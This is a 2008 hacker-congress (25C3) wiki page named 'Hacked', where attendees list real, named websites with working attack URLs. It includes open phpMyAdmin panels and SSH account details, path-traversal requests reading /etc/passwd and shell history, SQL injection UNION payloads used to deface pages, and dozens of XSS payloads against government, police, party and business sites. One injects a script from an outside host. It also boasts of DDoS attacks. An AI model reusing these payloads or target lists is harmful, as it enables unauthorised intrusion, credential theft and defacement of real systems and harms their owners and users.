Hacked
From 25C3 Public Wiki
am 27.12.2008 geht's wieder los.
Contents |
[edit] NPD stuff on the subpage
Just to add npd stuff .. we are currently investigating the NPD server "195.50.135.187". You can find more infos here.
[edit] zombie resurrection hacks
- http://www.bzoe.at ICH BIN WIEDER DA!
- http://www.bzoe.at/_phpmyadmin NO USER/PASSWORD, have fun.
- http://www.athletesconnection.com/ schon wieder gehackt (die sichern das phpmyadmin nie ab ;)
[edit] Foodhacks
- Burger-King Voucher-Generator is offline for now.
- Asia food (the 2nd one, the green signs) at the station gives 50c discount if you show your congress badge. good food there, I recommend #24b
[edit] Misc
- Spread the word:
- http://slanp.ch/modules.php?op=modload&name=phpBB_14&file=index&action=viewforum&forum=45&22987 (Username allows XSS)
- http://www.ctrl-alt-delete.info/index.php?include=gaesteliste
- http://www.provenzali.it/i.html
- http:////augenoptik-schmidt.de/
- http://www.conclusionimplementation.nl/
- http://www.unserabgeordneter.de/
- http://apollo.zeit.de/wo/article.php?id=232323
- http://www.cdu-taunusstein.de/home.php
- http://www.sbmtrader.com/
- http://www.esdi.es/blog/
- http://www.gryphondreaming.com/ (bottom banner)
- http://www.minis-widnau.ch/
- http://www.peg.ch/
- http://www.lars-lanfranchi.ch/
- http://www.dominic-schmitter.ch/
- http://www.hyundai-forstner.at/ (-->Angebote)
- http://virussentinel.com/
- BASH-Account (SSH open) Host: archibald.dreamhost.com; User: stfox100; Password: **********; Webseite: <http://www.sbmtrader.com/>; Debian 3.1; Kernel 2.4.32
- http://www.wabe-aachen.de/admin/pma/ open phpMyAdmin
- http://www.brandenburg.de/cms/detail.php/lbm1.c.396942.de bzw. http://www.stk.brandenburg.de/gb_bbg/ (Weder SQL Injection noch XSS)
- Beware! rvr-prx.bayern.de (Beachte /admin)
- Schon vorher und für alle verfügbar: Dieeeeeeeee Telekom Switch Config
- ilch(.de)clan script: CSRF in the whole admin panel (e.g.adding admin user)
- Microsoft community site does not ... : http://channel9.msdn.com/Forums/Feedback/ (you woldn't use this to freshup all msdn forums, would you?)
- http://aktiv-boersma.de/Half_banner_234x60.gif boersma ******
- http://www.agenda21.de/phpmyadmin/ ? http://www.agenda21.de/php/config.inc !
- The three Dunkin'Donuts Stores next to Alexanderplatz successfully d-dosed...please add pictures!
- http://www.youtube.com/watch?v=3b6Kzm6y6c0
- http://img387.imageshack.us/my.php?image=dscf4391it7.jpg
- http://img261.imageshack.us/my.php?image=dscf4383ax3.jpg
- The 25C3 was successfully d-dosed (at day1 already!), the BCC is constantly running near capacity.
- http://img187.imageshack.us/img187/1214/belkinroutermo7.png
- http://www.muho-mannheim.de/frame.php?path=http%26%23x003a;//www.google.com%23
- http://www.eduhi.at/eduhi/eduhi.php?url=http://www.google.com
- http://www.nplg.gov.ge/frames.php?url=http://www.google.com
- http://forum1.onlinewelten.com/redirector.php?url=http://www.google.de
- http://www.3dsupply.de/shop/search.php?query=%3Cimg+src%3D%27http%3A%2F%2Fevents.ccc.de%2Fcongress%2F2008%2Fwiki%2Fimages%2F4%2F43%2FVertical_banner_120x240.gif%27%3E+&query_submit=Los!&PHPSESSID=04ec6a59b208470cfa01ed5608d5435a Running around - loosin ma memory
- http://www.northwindsafety.com/JobsApp/ (User: anonymous, password: foobar)
- http://pirun.ku.ac.th/~cpcpyc/explorer.php?dir=.. and http://pirun.ku.ac.th/~cpcpyc/edit.php?dir=..&name=delete.php
- http://www.kapo.ch/index_nachladen.cfm?seite_nachladen=http://www.google.com
[edit] LFI/RFI
- http://pnos.ch/?lang=37&seite=../../admin/.htpasswd fs root groups version
- http://www.xkarinx.ch/_eb/m1/src_viewer.php?datei=../../../../../../root/.bash_history
- http://www.xkarinx.ch/_eb/m1/src_viewer.php?datei=../../../../../../etc/passwd
- http://www.psbnet.de/index.php?datei=../../../../../../../etc/passwd
- http://www.daewoo-center-essen.de/loader.php?datei=../../../../../../../etc/passwd
- typical 1&1 hosting - and so for the 3rd year in a row: http://tinyurl.com/1und2
- http://www.augenoptik-schmidt.de/news_popup.php?datei=../../../../../../../../../../../etc/passwd
- http://www.grundschule-hoeingen.de/news.php?datei=../../../../../../../../../../../etc/passwd
- http://www.elfi-schwarz.de/kurse.php?datei=../../../../../../../../../../../etc/passwd
- http://www.lohheide.de/admin.php?datei=../../../../../../../../../../../etc/passwd
- http://www.marine-marketing.gr/newsclip.php?file=../../../../../../../../../../../etc/passwd
- http://www.kirche-koeln-muelheim.de/termine/details.php?file=../../../../../../../../../../../etc/passwd
- http://www.ht-studios.de/go/profil/agb/download.php?file=../../../../../../../../../../../etc/passwd&type=text/plain&inBrowser=true
- http://chucothedriver.com/Travelogue/viewer.cgi?file=../../../../../../../../../../etc/passwd
- http://www.mbvan.org/cgi-bin/sch_art/read.php?file=../../../../../../../../../../../etc/passwd
- http://www.wechseljahre-remifemin.de/scripts/print.php?file=../../../../../../../../../../../etc/passwd
- http://www.brustkrebs-berlin.de/system_berlin/scripts/print.php?file=../../../../../../../../../../../etc/passwd
- http://www.daoc.drachengarde.org/index.php?seite=../../../../../../../etc/passwd
- http://www.washingtoninstitute.org/download.php?file=../../../../../../../../../../etc/passwd
- http://www.price2price.se/admin/includes/configure.php.bak
- http://www.bruegel.org/Public/fileDownload.php?target=../../../../../../../../../../etc/passwd
- http://www.mhi.uni-bonn.de/index.php?site=/etc/passwd
- http://www.reiki-in-berlin.de/cgi-bin/wps/xtra.cgi?filename=../../../../../../../../etc/passwd
- http://www.xanworld.com/show.php?file=../../../../../../../../../etc/passwd
- http://grox.net/misc/humor/show.php?file=../../../../../../../../../../etc/passwd
- http://www.leutek.de/compulight/download.inc.php?file=../../../../../etc/passwd
- cr4nk collection: http://nopaste.org/p/a0I6SIrBG
- http://www.qzedu.gov.cn/php/bak/qzedu_member.txt
- http://www.lithoart-ma.de/druck.php?file=../../../../../../etc/passwd
- http://www.maharashtra.gov.in/marathi/news/popupNewsShow1.php?file=../../../../etc/passwd
- http://www.searchpope.com/info.php?user=reiseleiterecuador&file=../../../../../../../../../../../../../../../../../../etc/passwd
- http://hallofshame.gp.co.at/index.php?file=../../../../../etc/passwd
- http://www.dickmannshenke.de/show.php?main=/../../../../../etc/passwd
- pick an account: http://www.kidlex.de/fp/user and login http://www.kidlex.de/FrontPublisher/admin.cgi/admin.86673/File_Manager.html?path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&action=editfile&file=passwd
[edit] SQL-Injection
- http://www.kammerspiele.ch/seite.php?id=1%20and%20sid%20is%20null (Splotches? JFGI!)
- http://www.tvinfo.de/exe.php3?showSenderID=23%20AND%201=0&target=senderlist.inc
- http://www.hamburg-messe.de/hmc/content/co/de/termine_inland.php?action=kurzinfos&id=168%27%20AND%201=0%20/*
- http://www.vwd.com/vwd/produkte.htm?u=0&k=0&sektion=4%20AND%201=0&seite=geschaeftsbereich
- http://www.mobile-city.org/index.php?nav=1%22
- http://www.mobile-city.org/index.php?nav=18&form_ich_will=J&form_nachname=SQL%27&send=ja
- http://www.mobile-city.org/index.php?mode=detail&page=59%27
- http://www-cgi.uni-regensburg.de/Studentisches/FS_Biologie/content/guestbook/guestbook.php?nav=guestbook&subnav=guestbook (minus: POST only; plus: value of captcha as plain text in html code)
- http://pp3.histechs.com/longthai/jsp/www/bonus.jsp?TopUserId=0&Month=200811&name=admin&passwd='%20or%201=1%20--'
- http://www.media-markt.de/top5/ansicht/index.php?pid=-1337%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,version(),23
- http://www.rg-bx.it/newslesen.php?id=1337%20union%20select%20%22Grüße%20vom%2025C3%22,%22%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E%22,5,23
- http://www.diechristen.at/index.php?seite=news&kat=foo%27%20union%20select%201,%22December%2027th%20to%2030th,%202008%22,3,4,5,6,%22%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E%22,8,9,10,11,12%20--%20
- http://www.cduhessen.de/home/lebenslauf.cfm?ID=-77%20UNION%20ALL%20SELECT%201,5,3,2,%22Have%20a%20great%20time%20on%2025c3%22,6,%22%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif%3E%22,8--
- http://www.cdu-erftstadt.de/index.php?id=1%20bla%20sql
- http://www.vernunft-schweiz.ch/links.php?link_id=6%20OR%201%20UNION%20select%201,2,(select%20count(*)%20from%20links),4,5,6%20from%20links
- http://www.demanagement.com/property.php?propertyID=%27FAIL
- http://www.thegiggallery.com/index.php?f=bd&iz=0%20and%200%20union%20select%20(select%20count(*)%20from%20tbl_poster),2,3
- http://www.visitmadisoncounty.com/lodging_details.php?LodgingID=0%20union%20select%200,char(60,98,32,115,116,121,108,101,61,99,111,108,111,114,58,114,101,100,62,50,53,67,51,60,47,98,62),3,4,5,char(45),7,8,char(66,67,67),10,char(66,101,114,108,105,110),char(71,101,114,109,97,110,121),char(32),char(45),char(45),12,13,char(45),char(101,118,101,110,116,115,46,99,99,99,46,100,101,47,99,111,110,103,114,101,115,115,47,50,48,48,56,47),16,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
- http://www.congetzchaim.com/noahsclassifieds/index.php?method=showdetails&list=advertisement&rollid=%27EVIl%20SQL%20HERE&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=%273
- http://pnos.ch/?seite=meldungen_detail.php&sprache=37&meldungid=0%20union%20select%201,0,char(50,48,48,56,45,49,50,45,50,55),char(50,53,67,51,32,111,119,110,115,32,121,111,117),char(60,97,32,104,114,101,102,61,104,116,116,112,58,47,47,101,118,101,110,116,115,46,99,99,99,46,100,101,47,99,111,110,103,114,101,115,115,47,50,48,48,56,47,62,60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,101,118,101,110,116,115,46,99,99,99,46,100,101,47,99,111,110,103,114,101,115,115,47,50,48,48,56,47,119,105,107,105,47,105,109,97,103,101,115,47,52,47,52,51,47,86,101,114,116,105,99,97,108,95,98,97,110,110,101,114,95,49,50,48,120,50,52,48,46,103,105,102,62,60,98,114,62,104,116,116,112,58,47,47,101,118,101,110,116,115,46,99,99,99,46,100,101,47,99,111,110,103,114,101,115,115,47,50,48,48,56,47,60,47,97,62),1%20as%20public%20--
- http://www.hwk-saarland.de/index.php?nav=1%22
- http://www.geneve.ch/police/communiques/divers/welcome.asp?comId=%27%20or%201
- http://www.ti.ch/DI/POL/comunicati/area_stampa/scheda.asp?Applikation_name=rubati&ID=EVIL SQL
- http://www.ti.ch/DI/POL/comunicati/area_stampa/archivio/default_archivio.asp?anno=%27EVIL%20SQL
- http://www.franjamoradarosario.org.ar/modulos/mmdle.asp?id=%27EVIL%20SQL
- http://www.franjamoradarosario.org.ar/modulos/feedback.asp?form=%27EVIl%20SQL
- http://www.jesus.ch/index.php/D/search/?searchHow=all&searchField=all&searchOrder=publishStart&searchString=&imageField.x=0&imageField.y=0 (Play with parameters)
[edit] XSS
- http://www.mannheim.de/io2/browseSearch_do.doB?currPath=%2FWebseiten&search=\'\"<img src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif>
(search is also VERY easy to XSS)
- http://www.hotelstandby.de/ (Zielort wird ausgegeben...)
- http://goellheim.de/cgi-bin/kalender/webcal/webcal.cgi (PERSISTENT!)
- http://jugendwahlrecht.de/gb.php (PERSISTENT)
- http://wdg-pocking.de/lehrer/pwforder.php bzw pwsend.php over post (var name:T2 (email)), ' and " escaped -> scr=...
- http://www.orf-gis.at/index.php?kategorie=suchen&thema=suchen&search_exp=q%3D%22%3E%3Ch1%3E%3Cfont+color%3Dgreen%3EWhy+should+we+trust+%3Cfont+color%3Dred%3EYOU%3C%2Ffont%3E%3F%3Cbr%3E%3Cimg+src%3Dhttp%3A%2F%2Fevents.ccc.de%2Fcongress%2F2008%2Fwiki%2Fimages%2F4%2F43%2FVertical_banner_120x240.gif%3E%3Cx
- http://www.terratec.net/de/treiberundsupport/faq_32476.html?selectproduct=Security%20%3Cp%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif%3E%3C/p%3E
- http://www.spd-hessen.de/.net/-1/html/11681/welcome.html ... fröhlichen Wahlkampf wünsche ich.
- http://www.rtlradio.de/index.php (oben links die Suche...)
- https://www.csu.de/partei/profil.htm?app=benutzervergessen post code in 'email': " onmousemove="alert("25C3")" [leave it with all quotation marks]
- http://www.junge-union.de/content/aktivwerden/absenden/ post code for e.g aktivwerden_vname: "> <img src=http://ccc.de/images/banner/25c3_banner.gif>
- http://www.jusos.de/ post code in the search field:<img src=http://ccc.de/images/banner/25c3_banner.gif>
- https://www.taz.de/zeitung/formulare/keinetaz/ Just enter in every field
- http://www.bernd-schmidbauer.de/index.php?cat=search Insert: <img src="http://events.ccc.de/congress/2008/%46ahrplan/images/conference-128x128.png"> in the search form
- http://www.petra-merkel.de/service/suche/ Insert: <img src="http://events.ccc.de/congress/2008/%46ahrplan/images/conference-128x128.png"> in the search form
- http://strobe.uwaterloo.ca/ist/keyword/keyword.php?searchterm=<iframe src=http://events.ccc.de width=600 height=480></iframe>
- http://waz.trauer.de/suchergebnis.html?firstname=&lastname=<img src="http://events.ccc.de/congress/2008/Fahrplan/images/conference-128x128.png">
- http://www.euv-frankfurt-o.de/de/search/index.html Insert: "<img src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif>
- http://www.police.be.ch/site/suche.htm?headerQuery=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.pom.be.ch/site/suche.htm?vtid=0&headerQuery=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.jura.ch/portal/site/acju/template.acjusearch/?simpleSearchQuery=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.kapo.zh.ch/internet/ds/kapo/de/search.html?search=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.chur.ch/d/search/index.cfm?criteria=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.eif.ch/searchLDAP.jsp?inputSearchText=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.repolagsued.ch/_iu_write/phpwcms/image_zoom.php?show=Ij48aW1nIHNyYz1odHRwOi8vZXZlbnRzLmNjYy5kZS9jb25ncmVzcy8yMDA4L3dpa2kvaW1hZ2VzLzYvNjcvMjVDMy1sb2dvLnBuZz4=
- http://www.lugano.ch/tools/search.cfm?keywords=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.pennergame.de/pw_forgotten/ Insert: <img src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif> bei email..
- http://www.jesus.ch/index.php/D/search/?searchHow=all&searchField=all&searchOrder=publishStart&searchString=%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png%3E
- http://www.brack.ch/ (enter “"><img src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png>” in search)
- http://www.iadb.org/search/?query=%22%3Cimg+src%3Dhttp%3A%2F%2Fevents.ccc.de%2Fcongress%2F2008%2Fwiki%2Fimages%2F4%2F43%2FVertical_banner_120x240.gif%3E&lang=en
- http://uni66.ogame.de/game/redir.php?url=%23%22%3E%3Cimg%20src=http://events.ccc.de/congress/2008/wiki/images/4/43/Vertical_banner_120x240.gif%3E#\
- https://q.inter.net/sms/sms.cgi with username POST “" size=20 style="WIDTH: 250px"><img src=http://events.ccc.de/congress/2008/wiki/images/6/67/25C3-logo.png><input type="text" value="Greetings from 25C3“
- http://www.tagesschau.de/multimedia_suche.jsp?suchbegriff=%22%3Cmeta+http-equiv%3D%22refresh%22+content%3D%221+URL%3Dhttp%3A%2F%2Fwww.shortlink.org%2Fmeldung%22%3E%22
- http://phase2.nadir.org/index.php?seite=5&operator=AND&alle=%3Cmeta+http-equiv%3D%22refresh%22+content%3D%220%3B+URL%3Dhttp%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeIgCIVQM9W8%22%3E
- http://events.ccc.de/congress/2008/wiki/index.php?useskin=%3C%2F%73%74%79%6C%65%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%2E%63%6B%65%72%73%2E%6F%72%67%2F%78%73%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%74%79%6C%65%3E%0A
[edit] Wallhacks
We proudly present the new real life category of hacking.
Hackcenter: http://img81.imageshack.us/my.php?image=wallhackwb5.jpg